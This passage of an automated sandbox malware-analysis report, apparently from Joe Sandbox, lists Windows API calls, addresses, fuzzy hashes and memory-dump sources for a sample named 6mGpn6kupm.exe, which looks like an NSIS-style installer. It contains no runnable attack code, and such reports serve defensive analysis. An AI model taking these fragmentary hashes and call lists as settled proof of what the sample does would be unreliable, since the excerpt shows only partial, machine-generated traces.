                                                                                                              • API ID: AllocGlobal
                                                                                                              • String ID:
                                                                                                              • API String ID: 3761449716-0
                                                                                                              • Opcode ID: 6cd7995ef4cb338d536d70b3ce7b7859000eef94c8cb4770d887a0ce9c077132
                                                                                                              • Instruction ID: 0dcef16407e1774efbd78795a504cc95f69fc0624a85a6f9492b6651d7e02324
                                                                                                              • Opcode Fuzzy Hash: 6cd7995ef4cb338d536d70b3ce7b7859000eef94c8cb4770d887a0ce9c077132
                                                                                                              • Instruction Fuzzy Hash: 3AB01272A44000DFEF008B65CC06F363A54E700301F244010FB00C0590C560C8208534
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                              • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                              • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                              • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                              • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                              • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                              • EmptyClipboard.USER32 ref: 004058B7
                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                              • CloseClipboard.USER32 ref: 00405912
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                              • String ID: (7B${
                                                                                                              • API String ID: 590372296-525222780
                                                                                                              • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                              • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                              • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                              • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                              • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                              • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,774D3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                              • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: (7B$A$Call
                                                                                                              • API String ID: 2624150263-413618503
                                                                                                              • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                              • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                              • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                              • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                              APIs
                                                                                                                • Part of subcall function 701C121B: GlobalAlloc.KERNELBASE(00000040,?,701C123B,?,701C12DF,00000019,701C11BE,-000000A0), ref: 701C1225
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 701C1C6B
                                                                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 701C1CB3
                                                                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 701C1CBD
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701C1CD0
                                                                                                              • GlobalFree.KERNEL32(?), ref: 701C1DB2
                                                                                                              • GlobalFree.KERNEL32(?), ref: 701C1DB7
                                                                                                              • GlobalFree.KERNEL32(?), ref: 701C1DBC
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 701C1FA6
                                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 701C2140
                                                                                                              • GetModuleHandleW.KERNEL32(00000008), ref: 701C21B5
                                                                                                              • LoadLibraryW.KERNEL32(00000008), ref: 701C21C6
                                                                                                              • GetProcAddress.KERNEL32(?,?), ref: 701C2220
                                                                                                              • lstrlenW.KERNEL32(00000808), ref: 701C223A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1749930895.00000000701C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 701C0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1749380141.00000000701C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1749974424.00000000701C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1750054487.00000000701C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_701c0000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 245916457-0
                                                                                                              • Opcode ID: 9638c894113057112ebf58b2884abe00560e1b5e7020cfa4bd2077549016558e
                                                                                                              • Instruction ID: 12621fa502bbfdcc3af421b3432ada8ece17d8b62c63a03b4b0cbf8acc826345
                                                                                                              • Opcode Fuzzy Hash: 9638c894113057112ebf58b2884abe00560e1b5e7020cfa4bd2077549016558e
                                                                                                              • Instruction Fuzzy Hash: 1F229A71C84205DFDB228FA4C9847EFB7B5FB26315F22456EE166E2680D7B0DA80DB50
                                                                                                              APIs
                                                                                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Iw\Bargains, xrefs: 004021C3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateInstance
                                                                                                              • String ID: C:\Users\user\AppData\Local\Iw\Bargains
                                                                                                              • API String ID: 542301482-2976193113
                                                                                                              • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                              • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                                              • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                              • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFindFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 1974802433-0
                                                                                                              • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                              • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                              • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                              • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                              APIs
                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                              • GetSysColor.USER32(?), ref: 004045FE
                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                              • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                              • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                              • SetCursor.USER32(00000000), ref: 00404720
                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                              • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                              • String ID: Call$N
                                                                                                              • API String ID: 3103080414-3438112850
                                                                                                              • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                              • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                              • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                              APIs
                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                              • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                              • String ID: F
                                                                                                              • API String ID: 941294808-1304234792
                                                                                                              • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                              • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                              • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                              APIs
                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                              • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                              • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                              • wsprintfA.USER32 ref: 004060B3
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                              • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\6mGpn6kupm.exe,80000000,00000003), ref: 00405EE2
                                                                                                                • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                              • API String ID: 2171350718-461813615
                                                                                                              • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                              • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                              • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                              • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                              APIs
                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                              • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                              • GetSysColor.USER32(?), ref: 0040444C
                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                              • DeleteObject.GDI32(?), ref: 00404476
                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_6mGpn6kupm.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2320649405-0
                                                                                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                              • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1713103639.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1713077925.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713122419.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713138679.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1713218887.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
